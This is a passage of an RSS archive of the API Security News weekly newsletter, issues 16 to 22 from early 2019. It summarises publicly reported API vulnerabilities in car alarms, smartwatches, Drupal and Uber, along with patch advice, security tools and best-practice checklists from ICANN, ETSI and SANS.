<p>The first one is in <strong>Pandora and Viper (Clifford) car alarm systems</strong>. These systems control about 3 million vehicles. The vulnerability in question is an Insecure Direct Object Reference (IDOR) attack, in which attackers use security token of one user to access data of someone else. What made it worse was that the user IDs could be just enumerated. Attackers created demo accounts for themselves to access the APIs. After that, <a href="https://www.pentestpartners.com/security-blog/gone-in-six-seconds-exploiting-car-alarms/" target="_blank" rel="noopener">they could simply go through the IDs, get information about the users, reset their passwords, and take over the accounts</a>. Full access provided them all information about the vehicles, and even allowed the attackers to send commands to them, such as killing the engine.</p>
<p>The other vulnerable API was found in <strong>Outdoor Tech CHIPS smart headphones for skiing and snowboarding</strong>. These helmet headphones can play music and allow skiers and snowboarders to talk to their friends <em>à la</em> walkie-talkie. The walkie-talkie functionality is cloud-based and goes through the company servers. <a href="https://www.pentestpartners.com/security-blog/hacking-ski-helmet-audio/" target="_blank" rel="noopener">The APIs for that functionality are highly insecure</a>. They allow account enumeration, and for every account, they leak name, email, GPS, and audio stream.</p>
<p>Elsewhere, virtual worlds can be as vulnerable. A research team (Ibrahim Baggili, Peter Casey, and Martin Vondráček) at the University of New Haven <a href="https://thehackernews.com/2019/02/bigscreen-vr-hacking.html" target="_blank" rel="noopener">found multiple vulnerabilities</a> in the popular <strong>Bigscreen virtual reality app and its underlying Unity APIs</strong>. Inputs were not sanitized, so attackers could inject JavaScript and take control. They could discover private rooms, secretly eavesdrop discussions, see user screens, get access to their microphones, and so on.</p>
<h2>Tools</h2>
<p><strong>42Crunch</strong> Platform, a cloud-based API security platform is out. It provides <a href="https://www.42crunch.com/42crunch-announces-the-launch-of-the-first-api-security-platform/" target="_blank" rel="noopener">DevSecOps process built around the OpenAPI definition of your API</a>:</p>
<ol>
<li>Audit the API contract for vulnerabilities. This is similar to the <a href="https://apisecurity.io/tools/audit/" target="_blank" rel="noopener">Security Audit tool at APIsecurity.io</a>.</li>
<li>Scan the live API endpoint for contract compliance to ensure that the API implementation matches the API contract.</li>
<li>Protect the API with a micro API firewall (including Kubernetes sidecar model) that uses a positive security model based on the API definition. This ensures that only calls and responses that match the API contract go through.</li>
</ol>
<p><a href="https://www.42crunch.com/42crunch-announces-the-launch-of-the-first-api-security-platform/"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-5835" src="https://apisecurity.io/wp-content/uploads/2019/03/42crunch-platform-services.png" alt="" width="1500" height="900" /></a></p>
<p>(Disclosure: I work at 42Crunch.)</p>
<h2>Tutorials</h2>
<p>Want a better understanding of how encryption behind TLS and HTTPS works? Check out these <strong>Computerphile</strong> videos:</p>
<ul>
<li><a href="https://www.youtube.com/watch?v=NmM9HA2MQGI" target="_blank" rel="noopener">Secret Key Exchange (Diffie-Hellman)</a></li>
<li><a href="https://www.youtube.com/watch?v=vsXMMT2CqqE" target="_blank" rel="noopener">Man-in-the-middle attacks / RSA</a></li>
</ul>
<p>These tutorials are very easy to grasp, entertaining, and educational.</p>
<h2>Best Practices</h2>
<p><strong>SANS Institute</strong> published their <a href="https://software-security.sans.org/resources/swat" target="_blank" rel="noopener">Securing Web Application Technologies (SWAT) Checklist</a>. It covers in detail:</p>
<ul>
<li>Error Handling and Logging</li>
<li>Data Protection</li>
<li>Configuration and Operations</li>
<li>Authentication</li>
<li>Session Management</li>
<li>Input and Output Handling</li>
<li>Access Control</li>
</ul>
<p><em><strong>Subscribe to this weekly newsletter at </strong></em><a href="https://APIsecurity.io/"><em><strong>https://APIsecurity.io/</strong></em></a></p>
<p>The post <a href="https://apisecurity.io/issue-22-sans-swat-list-42crunch-platform-launch/">Issue 22: SANS SWAT list, 42Crunch Platform launch</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 21: Amazon Ring Doorbell camera hacked, open APIs coming to healthcare</title>
		<link>https://apisecurity.io/issue-21-amazon-ring-doorbell-camera-hacked-open-apis-coming-healthcare/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 07 Mar 2019 00:00:16 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5825</guid>

					<description><![CDATA[<p>This week, we got vulnerable APIs in Kubernetes, real estate services in Australia, and Amazon Ring cameras. We also take a look at upcoming healthcare API standards in the US changes in attack trends between 2017 and 2018. Vulnerabilities Kubernetes continues to have API vulnerabilities (see our earlier issues 9 and 13). This time, it [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-21-amazon-ring-doorbell-camera-hacked-open-apis-coming-healthcare/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-21-amazon-ring-doorbell-camera-hacked-open-apis-coming-healthcare/">Issue 21: Amazon Ring Doorbell camera hacked, open APIs coming to healthcare</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we got vulnerable APIs in Kubernetes, real estate services in Australia, and Amazon Ring cameras. We also take a look at upcoming healthcare API standards in the US changes in attack trends between 2017 and 2018.</p>
<h2>Vulnerabilities</h2>
<p><strong>Kubernetes </strong>continues to have API vulnerabilities (see our earlier issues <a href="https://apisecurity.io/issue-9-patch-kubernetes-and-nuuo-security-cameras-node-js-security-guide-http3/" target="_blank" rel="noopener">9</a> and <a href="https://apisecurity.io/issue-13-microsoft-services-chromecast-hacks-limitations-waf/" target="_blank" rel="noopener">13</a>). This time, it has turned out that <a href="https://github.com/kubernetes/kubernetes/issues/74534" target="_blank" rel="noopener"><code>PATCH</code> API request payload was not sanitized</a>. Attackers could craft a payload to overload the CPU and perform a denial of service (DoS) attack. To prevent the attack, upgrade Kubernetes to v1.11.8, v1.12.6, or v1.13.4, or remove the <code>PATCH</code> API call permission from untrusted users.</p>
<p>Banks are using APIs to get estimates of property values for mortgages. The main <strong>property valuer in Australia, LandMark White Limited,</strong> had their API compromised. As a result, a database of the deals that went through them ended up publicly available on the internet. The source of the breach turned out to be an <a href="https://www.computerworld.com.au/article/657662/landmark-white-blames-exposed-api-data-breach/" target="_blank" rel="noopener">an unprotected API</a>. From what we know, it looks like that particular API was supposed to be an internal module, not called directly from the outside. However, attackers still managed to exploit the API and retrieve the data.  All four major banks in Australia have stopped using the service, and the company is in deep crisis.</p>
<p><strong>Amazon&#8217;s Ring Doorbell cameras</strong> <a href="https://dojo.bullguard.com/dojo-by-bullguard/blog/ring/" target="_blank" rel="noopener">had a serious API security flaw</a>. While the APIs themselves were properly protected, their outputs were not. The audio and video footage from the doorbell cameras was effectively transmitted to the mobile app in plaintext.  This enabled attackers to intercept and even substitute the audio and video stream from the cameras to user. Unfortunately, Ring Doorbell cameras are not unique in that regard: we have previously reported API vulnerabilities in <a href="https://apisecurity.io/issue-9-patch-kubernetes-and-nuuo-security-cameras-node-js-security-guide-http3/" target="_blank" rel="noopener">NUUO</a> and <a href="https://apisecurity.io/issue-12-car-apis-leaking-location-breached-security-cameras-regulation-helps/" target="_blank" rel="noopener">Guardzilla</a> security cameras.</p>
<h2>Legislation</h2>
<p>The U.S. Department of Health and Human Services (HHS) <a href="https://www.healthcarelawtoday.com/2019/02/15/increased-interoperability-of-health-information-two-new-proposed-rules/?utm_source=Mondaq&amp;utm_medium=syndication&amp;utm_campaign=View-Original" target="_blank" rel="noopener">has proposed two new standards</a> for <strong>patient data open APIs</strong>:  <a href="https://www.cms.gov/Center/Special-Topic/Interoperability/CMS-9115-P.pdf" target="_blank" rel="noopener"><ins>CMS-9115-P</ins></a> and <a href="https://www.healthit.gov/sites/default/files/nprm/ONCCuresActNPRM.pdf" target="_blank" rel="noopener"><ins>RIN 0955-AA01</ins></a>.</p>
<p>By 2020, healthcare vendors are expected to start providing free access to patient data using standard APIs. The goal is to remove any barriers and enable consumer application ecosystem. Proposals are open to comments until April 2019. This has the potential to be as big as Open Banking.</p>
<h2>Industry Stats</h2>
<p>Some <a href="https://www.itweb.co.za/content/PmxVE7KXLyQMQY85" target="_blank" rel="noopener">trends visible in the statistics from ITWeb and Radware</a>:</p>
<blockquote><p>&#8220;2017 was the ransom year that saw campaigns like WannaCry wreak havoc; whereas 2018 proved to be the <strong>year of automated incidents, with sensational attacks on APIs</strong> [emphasis added] (85%, according to the Radware research) especially bot attacks&#8221;</p></blockquote>
<p><em><strong>Subscribe to this weekly newsletter at </strong></em><a href="https://APIsecurity.io/"><em><strong>https://APIsecurity.io/</strong></em></a></p>
<p>The post <a href="https://apisecurity.io/issue-21-amazon-ring-doorbell-camera-hacked-open-apis-coming-healthcare/">Issue 21: Amazon Ring Doorbell camera hacked, open APIs coming to healthcare</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 20: Drupal APIs hacked, EU releases IoT standards</title>
		<link>https://apisecurity.io/issue-20-drupal-apis-hacked-eu-iot-standards/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 28 Feb 2019 00:28:19 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5819</guid>

					<description><![CDATA[<p>This week we look into vulnerabilities at Uber and Drupal, the best practices from the ICANN DNS security checklist, the upcoming European IoT security standards, and more vulnerability stats from 2018. Vulnerabilities This is the worst API vulnerability of the year so far. Drupal&#8216;s RESTful Web Services (rest), JSON:API, and other web services modules allowed [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-20-drupal-apis-hacked-eu-iot-standards/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-20-drupal-apis-hacked-eu-iot-standards/">Issue 20: Drupal APIs hacked, EU releases IoT standards</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week we look into vulnerabilities at Uber and Drupal, the best practices from the ICANN DNS security checklist, the upcoming European IoT security standards, and more vulnerability stats from 2018.</p>
<h2>Vulnerabilities</h2>
<p>This is the worst API vulnerability of the year so far. <strong>Drupal</strong>&#8216;s RESTful Web Services (rest), JSON:API, and other web services modules <a href="https://www.theregister.co.uk/2019/02/20/drupal_cve_2019_6340/">allowed executing arbitrary code remotely</a> because the input data was not properly sanitized. Attackers are already exploiting the vulnerability to take over websites. If your site is running on Drupal, upgrade and patch it ASAP!</p>
<p><strong>Uber </strong>has fixed an API vulnerability as well. One of their API endpoints didn&#8217;t have proper response sanitization. As result, <a href="https://medium.freecodecamp.org/leakage-of-client-secret-server-tokens-of-all-uber-developer-applications-657d9d7fd30e">the API was leaking client secrets and server tokens of all Uber apps</a>. Attackers could acquire those and impersonate as a particular partner application.</p>
<h2>Best Practices</h2>
<p>DNS is a vital system because it determines which IP addresses requests are directed to. A successful DNS attack enables traffic redirection and man-in-the-middle attacks.</p>
<p>We have covered the DNS security directive of the US Department of Homeland Security (DHS) in <a href="https://apisecurity.io/issue-16-dhs-dns-hijacking-directive-plus-5-api-security-rules/">our issue 16</a>. Now <strong>ICANN </strong>(top level internet domain body) has spoken as well. They have issued a <a href="https://www.icann.org/news/announcement-2019-02-22-en">press release</a> urging the world to switch to DNSSEC. ICANN also published a <a href="https://www.icann.org/news/announcement-2019-02-15-en">checklist for DNS security</a>:</p>
<ul>
<li>Ensure all system security patches have been reviewed and applied.</li>
<li>Review log files for unauthorized access to systems, especially for administrator access.</li>
<li>Review internal controls over administrator (<code>root</code>) access.</li>
<li>Verify the integrity of every DNS record, as well as the change history of those records.</li>
<li>Enforce sufficient password complexity, especially the minimum length of password.</li>
<li>Ensure that passwords are not shared with other users.</li>
<li>Ensure that passwords are never stored or transmitted in cleartext.</li>
<li>Enforce regular and periodic password changes.</li>
<li>Enforce a password lockout policy.</li>
<li>Ensure that DNS zone records are DNSSEC signed and your DNS resolvers perform DNSSEC validation.</li>
<li>Ideally ensure that multi-factor authentication is enabled to all systems, especially for administrator access.</li>
<li>Ideally ensure that your email domain has a DMARC policy with SPF or DKIM and that you enforce the policies provided by other domains on your email system.</li>
</ul>
<h2>Standards</h2>
<p><strong>European Telecommunications Standards Institute</strong> (ETSI) has released <a href="https://www.etsi.org/deliver/etsi_ts/103600_103699/103645/01.01.01_60/ts_103645v010101p.pdf">ETSI TS 103 645 standard for consumer IoT security</a>. The key takeaways are:</p>
<ul>
<li>No universal default passwords.</li>
<li>Implement a way to manage the reports of vulnerabilities.</li>
<li>Keep software updated.</li>
<li>Store credentials and other security-sensitive data securely.</li>
<li>Communicate securely.</li>
<li>Minimize exposed attack surfaces.</li>
<li>Ensure software integrity.</li>
<li>Ensure that personal data is always protected.</li>
<li>Make systems resilient to outages.</li>
<li>Examine system telemetry data.</li>
<li>Make it easy for consumers to delete their personal data.</li>
<li>Make the installation and maintenance of devices easy.</li>
<li>Validate all input data.</li>
</ul>
<h2>Trends</h2>
<p><strong>EdgeScan </strong>has released their <a href="https://www.infosecurity-magazine.com/news/web-application-security/">4th annual Vulnerability Stats Report</a>. Here are some stats from 2018 that they are seeing:</p>
<ul>
<li>Approximately 20% of vulnerabilities are web and API-related.</li>
<li>For web applications, roughly 15% of vulnerabilities are cross-site scripting (XSS) and 6% are SQL injections.</li>
<li>Around 45% of vulnerabilities in infrastructure are caused by outdated or misconfigured TLS/SSL.</li>
</ul>
<p><em><strong>Subscribe to this weekly newsletter at <a href="https://APIsecurity.io/">https://APIsecurity.io/</a></strong></em></p>
<p>The post <a href="https://apisecurity.io/issue-20-drupal-apis-hacked-eu-iot-standards/">Issue 20: Drupal APIs hacked, EU releases IoT standards</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 19: Half of Amazon&#8217;s top-selling smart devices found vulnerable</title>
		<link>https://apisecurity.io/issue-19-half-amazon-top-selling-smart-devices-found-vulnerable/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 21 Feb 2019 00:00:56 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5806</guid>

					<description><![CDATA[<p>This week, we look into the latest vulnerabilities, patches that TLS libraries require, and best practices for token management security. Vulnerabilities You&#8217;d think casinos are at the forefront of security, after all they handle money. Apparently, this is not always the case. Atrient&#8217;s digital rewards kiosks for casinos used public unencrypted APIs to communicate with the backend servers. [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-19-half-amazon-top-selling-smart-devices-found-vulnerable/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-19-half-amazon-top-selling-smart-devices-found-vulnerable/">Issue 19: Half of Amazon&#8217;s top-selling smart devices found vulnerable</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we look into the latest vulnerabilities, patches that TLS libraries require, and best practices for token management security.</p>
<h2>Vulnerabilities</h2>
<p>You&#8217;d think casinos are at the forefront of security, after all they handle money. Apparently, this is not always the case. Atrient&#8217;s <strong>digital rewards kiosks for casinos</strong> used <a href="https://www.cbronline.com/feature/atrient-vulnerability-allegations">public unencrypted APIs to communicate</a> with the backend servers. Thus, anyone could listen the traffic containing customers&#8217; personal information. Attackers could even submit data, like add credit for themselves.</p>
<p>Turns out the smart <strong>Electric Scooter by Xiaomi</strong> (M365) <a href="https://thehackernews.com/2019/02/xiaomi-electric-scooter-hack.html" target="_blank" rel="noopener">has unprotected APIs</a>. Although the mobile app has password protection, behind the scenes, the application is invoking APIs with no authentication required.</p>
<p>Smartwatches from well-known brands can have vulnerable APIs, too. The APIs behind <strong>Lenovo Watch X</strong> <a href="https://techcrunch.com/2019/02/11/lenovo-watch-x-security-bugs/" target="_blank" rel="noopener">do not use encryption at all</a>. Information (such as username, password, and location) is sent as cleartext. Knowing the username is all it takes to take control over someone&#8217;s watch. See also our earlier smartwatch breach reports in <a href="https://apisecurity.io/issue-18-security-audits-for-your-api-contracts-google-limits-gmail-api-access/" target="_blank" rel="noopener">Issue 18</a> and <a href="https://apisecurity.io/issue-7-oauth-attacks-vulnerabilities-drones-kids-watches/" target="_blank" rel="noopener">Issue 7</a>.</p>
<h2>Patch Required</h2>
<p>There has been a new successful Bleichenbacher <strong>attack on TLS v3</strong>. <a href="https://www.zdnet.com/article/new-tls-encryption-busting-attack-also-impacts-the-newer-tls-1-3/" target="_blank" rel="noopener">Attackers can cause TLS to downgrade to v2 and get exploited</a>. If your TLS/SSL library is older than November 2018, upgrade it asap!</p>
<h2>Research</h2>
<p>Researchers from University of Michigan and Universidade Federal Rural de Pernambuco have looked into <strong>the security of top-selling smart devices on Amazon</strong>.  They took 96 Wi-Fi and Bluetooth-enabled devices, and analyzed the smartphone apps that control these devices. The basic API and network security of these apps <a href="https://arxiv.org/pdf/1901.10062.pdf" target="_blank" rel="noopener">turned out to be quite bad</a>:</p>
<ul>
<li>31% of the apps had no encryption at all.</li>
<li>19% of the apps had hard-coded keys.</li>
</ul>
<h2>Best Practices</h2>
<p>Isabelle Mauny from 42Crunch has published her <a href="https://www.42crunch.com/token-management-best-practices/" target="_blank" rel="noopener"><strong>Token Management Security Best Practices</strong></a>. Here&#8217;s a quick overview on the table of contents :</p>
<ul>
<li>Trust no one</li>
<li>Obtaining tokens and API keys</li>
<li>Token management</li>
<li>Don&#8217;t hardcode secrets</li>
<li>OAuth is not for authentication</li>
<li>JWT content and access</li>
<li>JWT validation</li>
</ul>
<p><em><strong>Subscribe to API Security weekly newsletter at <a href="https://APIsecurity.io/" target="_blank" rel="noopener">https://APIsecurity.io/</a></strong></em></p>
<p>The post <a href="https://apisecurity.io/issue-19-half-amazon-top-selling-smart-devices-found-vulnerable/">Issue 19: Half of Amazon&#8217;s top-selling smart devices found vulnerable</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 18: Tool for API security audit, Google limits Gmail API access</title>
		<link>https://apisecurity.io/issue-18-security-audits-for-your-api-contracts-google-limits-gmail-api-access/</link>
		
		<dc:creator><![CDATA[Laura Ruusuvuori]]></dc:creator>
		<pubDate>Thu, 14 Feb 2019 00:39:35 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5784</guid>

					<description><![CDATA[<p>Vulnerabilities We have reported on API vulnerabilities in kids&#8217; smartwatches before. The watches remain vulnerable to API attacks, these stories just keep pouring in: The European Union is recalling Enox Safe-Kid-One smartwatches because of vulnerable APIs. The APIs have no authentication or encryption, so attackers can access them, retrieve any information on them (like location), change [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-18-security-audits-for-your-api-contracts-google-limits-gmail-api-access/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-18-security-audits-for-your-api-contracts-google-limits-gmail-api-access/">Issue 18: Tool for API security audit, Google limits Gmail API access</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2>Vulnerabilities</h2>
<p>We have reported on API vulnerabilities in kids&#8217; smartwatches <a href="https://apisecurity.io/issue-7-oauth-attacks-vulnerabilities-drones-kids-watches/">before</a>. The watches remain vulnerable to API attacks, these stories just keep pouring in:</p>
<ul>
<li><strong><a href="https://ec.europa.eu/consumers/consumers_safety/safety_products/rapex/alerts/?event=viewProduct&amp;reference=A12/0157/19&amp;lng=en" target="_blank" rel="noopener">The European Union is recalling</a> Enox Safe-Kid-One smartwatches because of vulnerable APIs</strong>. The APIs have no authentication or encryption, so attackers can access them, retrieve any information on them (like location), change settings, initiate calls.</li>
<li>PenTestPartners found<strong> a serious <a href="https://www.pentestpartners.com/security-blog/gps-watch-issues-again/" target="_blank" rel="noopener">API vulnerablity in the Gator smartwatches</a></strong>. The API was using an undocumented parameter <code>User[Grade]</code> to identify the user level. The web UI had the parameter set to <code>1</code>, but if attackers changed the value to <code>0</code>, they got full admin access to the whole platform and all devices. Security by obscurity does not work.</li>
</ul>
<p><strong>APIs behind dating apps can be quite bad, too</strong>. The <a href="https://www.theregister.co.uk/2019/02/05/jackd_private_photo_bug/" target="_blank" rel="noopener">APIs of Jack&#8217;d</a>, a dating app for gay and bisexual men, do not require <em>any</em> authentication or authorization, only the mobile app does. The image IDs seem to be sequential and thus open to enumeration. This means that anyone knowing the API URL can just go and retrieve these private images of the application users one by one.</p>
<p><strong>Even devices meant to protect your network can have vulnerable APIs</strong>: <a href="https://latesthackingnews.com/2019/02/03/cujo-firewall-vulnerabilities-exposed/" target="_blank" rel="noopener">CUJO AI firewall device got hacked through its APIs</a>. The firewall exposed APIs that did not require authorization. The APIs were meant to be used by the mobile app to communicate with the cloud service. However, lack of authorization meant that any user with a valid <code>x-auth-token</code> could enumerate other users, access their policies, and even change them.</p>
<h2>Tools</h2>
<p>If you have OpenAPI (formerly known as Swagger) definitions, APISecurity.io now offers <a href="https://apisecurity.io/tools/audit" target="_blank" rel="noopener">API Contract <strong>Security Audit</strong></a>. This is an online security audit tool you can use to check your APIs for security and other issues:</p>
<ol>
<li>Go to <a href="https://apisecurity.io/tools/audit" target="_blank" rel="noopener">https://apisecurity.io/tools/audit</a>.</li>
<li>Upload your OpenAPI file, and wait while Security Audit checks it.</li>
<li>Check the audit report for the overall grade, and drill down into individual sections.<br />
<a href="https://apisecurity.io/wp-content/uploads/2019/02/OpenAPI-Contract-Security-Audit-Report-overview-large.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-5787" src="https://apisecurity.io/wp-content/uploads/2019/02/OpenAPI-Contract-Security-Audit-Report-overview-large.png" alt="Summary of API contract security audit: OpenAPI format requirements, security, data validation" width="2400" height="1256" /></a></li>
<li>Click the found issues for detailed descriptions, possible exploit scenarios, and recommended remediation for them.<br />
<a href="https://apisecurity.io/wp-content/uploads/2019/02/OpenAPI-Contract-Security-Audit-Report-drill-down-large.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-5789" src="https://apisecurity.io/wp-content/uploads/2019/02/OpenAPI-Contract-Security-Audit-Report-drill-down-large.png" alt="API security audit details: threat description, examples, exploit scenarios, remediation steps" width="2400" height="1256" /></a></li>
</ol>
<h2>Best Practices</h2>
<p>Speaking of OpenAPI, see <strong>the introduction to <a href="https://yos.io/2018/02/11/schema-first-api-design/" target="_blank" rel="noopener">schema-first API design</a> and OpenAPI</strong> <strong>Specification</strong> write-up by Yos Riady. His focus is on developer efficiency, but he also talks about how contract-based APIs help to design and enforce security.</p>
<h2>Governance</h2>
<p><strong>Google is now charging developers hefty fees for a security audit</strong> if they want to use Gmail APIs. If your application is using Gmail API, tomorrow (Feb 15, 2019) is your last day to submit it to a security review.</p>
<p>The cost is $15K-$75K. <a href="https://cloud.google.com/blog/products/g-suite/elevating-user-trust-in-our-api-ecosystems" target="_blank" rel="noopener">If not passed (or not submitted), Google will cut your API access</a>. Interesting API security governance step&#8230;</p>
<p><em><strong>You can subscribe to this weekly newsletter at </strong></em><a href="https://apisecurity.io/"><em><strong>https://APISecurity.io/</strong></em></a></p>
<p>The post <a href="https://apisecurity.io/issue-18-security-audits-for-your-api-contracts-google-limits-gmail-api-access/">Issue 18: Tool for API security audit, Google limits Gmail API access</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 17: 83 percent of web traffic is API, and  why query parameters are bad for secrets</title>
		<link>https://apisecurity.io/issue-17-83-web-traffic-apis-query-params-bad-secrets/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 07 Feb 2019 07:17:18 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5747</guid>

					<description><![CDATA[<p>This week we are mostly discussing best practices and tools, such as: The best methods to pass API keys and other sensitive data Tools that attackers use to discover APIs Why API security is never set-&#38;-forget Risks Never put API keys or other sensitive information in URLs or query parameters. These are visible to browser [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-17-83-web-traffic-apis-query-params-bad-secrets/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-17-83-web-traffic-apis-query-params-bad-secrets/">Issue 17: 83 percent of web traffic is API, and  why query parameters are bad for secrets</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week we are mostly discussing best practices and tools, such as:</p>
<ul>
<li>The best methods to pass API keys and other sensitive data</li>
<li>Tools that attackers use to discover APIs</li>
<li>Why API security is never set-&amp;-forget</li>
</ul>
<h2>Risks</h2>
<p>Never put API keys or other sensitive information in <strong>URLs or query parameters</strong>. These are visible to browser extensions, server logs, browser history, shared links, and as the referrer address. Always use headers or <code>POST</code> method instead. See <a href="https://www.fullcontact.com/blog/never-put-secrets-urls-query-parameters/" target="_blank" rel="noopener">this article</a> by Paris Mitton for details.</p>
<h2>Tools</h2>
<p>According to  Akamai&#8217;s Tony Lauro, 83% of web traffic is API traffic. Although this may not necessarily be the best way to track API usage (traffic is significantly skewed by streaming applications like Netflix), but it does show how APIs are starting to power pretty much everything we do online.</p>
<p><a href="https://threatpost.com/fighting-fire-with-fire-api-automation-risks/141163/" target="_blank" rel="noopener">In his article</a>, Lauro talks about how APIs are also becoming increasingly hard to hide from attackers. He discusses some of the <strong>tools that attackers are using</strong>, including:</p>
<ul>
<li>Fierce.pl</li>
<li>Certificate Transparency Logs</li>
<li>GitRob</li>
</ul>
<h2>Best Practices</h2>
<p>Andrew Useckas, CTO of ThreatX, has written <a href="https://blog.threatxlabs.com/key-points-for-building-and-connecting-security-friendly-apis" target="_blank" rel="noopener">a blog post</a> that lists and explains his <a><strong>key points for building and connecting security-friendly APIs</strong></a>:</p>
<ol>
<li>Strong authentication</li>
<li>Short-lived tokens</li>
<li>TLS transport encryption</li>
<li>Standard authentication and authorization on every endpoint</li>
<li>Sanitized user input</li>
</ol>
<h2>Opinions</h2>
<p>ComputerWeekly <a href="https://www.computerweekly.com/blog/Open-Source-Insider/Kubernetes-flaw-shows-API-security-is-no-set-forget-deal">has done a fascinating interview</a> with <strong>Andrew van der Stock (Synopsys and OWASP)</strong>. Andrew argues that API Security cannot be &#8220;set-and-forget&#8221;:</p>
<ul>
<li>API security needs to become part of API development and testing.</li>
<li>Protection needs to be a part of API design.</li>
<li>Full monitoring must be an integral part of runtime.</li>
</ul>
<p><em><strong>You can subscribe to this weekly newsletter at </strong></em><a href="https://apisecurity.io/"><em><strong>https://APISecurity.io/</strong></em></a></p>
<p>The post <a href="https://apisecurity.io/issue-17-83-web-traffic-apis-query-params-bad-secrets/">Issue 17: 83 percent of web traffic is API, and  why query parameters are bad for secrets</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 16: DHS DNS hijacking directive, plus 5 API security rules</title>
		<link>https://apisecurity.io/issue-16-dhs-dns-hijacking-directive-plus-5-api-security-rules/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 31 Jan 2019 00:00:36 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5528</guid>

					<description><![CDATA[<p>Vulnerabilities Another CPU DoS vulnerability in Go TLS (CVE-2019-6486) got fixed. This vulnerability impacts APIs implemented as Go microservices. The vulnerability enables attackers to exploit: TLS handshakes X.509 certificates JWT tokens ECDH shares ECDSA signatures. To fix the vulnerability, upgrade to Go versions 1.11.5 or 1.10.8. Best Practices DNS infrastructure is critical for web and [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-16-dhs-dns-hijacking-directive-plus-5-api-security-rules/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-16-dhs-dns-hijacking-directive-plus-5-api-security-rules/">Issue 16: DHS DNS hijacking directive, plus 5 API security rules</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2>Vulnerabilities</h2>
<p>Another CPU DoS vulnerability in <strong>Go TLS</strong> (CVE-2019-6486) <a href="https://github.com/golang/go/issues/29903">got fixed</a>. This vulnerability impacts APIs implemented as Go microservices. The vulnerability enables attackers to exploit:</p>
<ul>
<li>TLS handshakes</li>
<li>X.509 certificates</li>
<li>JWT tokens</li>
<li>ECDH shares</li>
<li>ECDSA signatures.</li>
</ul>
<p>To fix the vulnerability, upgrade to Go versions 1.11.5 or 1.10.8.</p>
<h2>Best Practices</h2>
<p>DNS infrastructure is critical for web and API security. To prevent DNS hijacking, the US Department of Homeland Security (DHS) has <a href="https://cyber.dhs.gov/ed/19-01/">issued their first ever Emergency Directive 19-01</a>:</p>
<ol>
<li>Verify DNS records.</li>
<li>Update DNS account passwords.</li>
<li>Add multi-factor authentication.</li>
<li>Monitor certificate transparency logs.</li>
</ol>
<h2>Conference Talks</h2>
<p>The API Days conference has <a href="https://www.youtube.com/watch?v=HLmiI9ZZUe8 ">published a video</a> of Isabelle Mauny&#8217;s &#8220;<strong>Five API Security Rules</strong>&#8221; talk:</p>
<ol>
<li>Know your APIs and their risks.</li>
<li>Validate and sanitize inputs.</li>
<li>Validate JWT tokens.</li>
<li>Implement fine-grained authorization.</li>
<li>Automate security.</li>
</ol>
<h2>Analysts</h2>
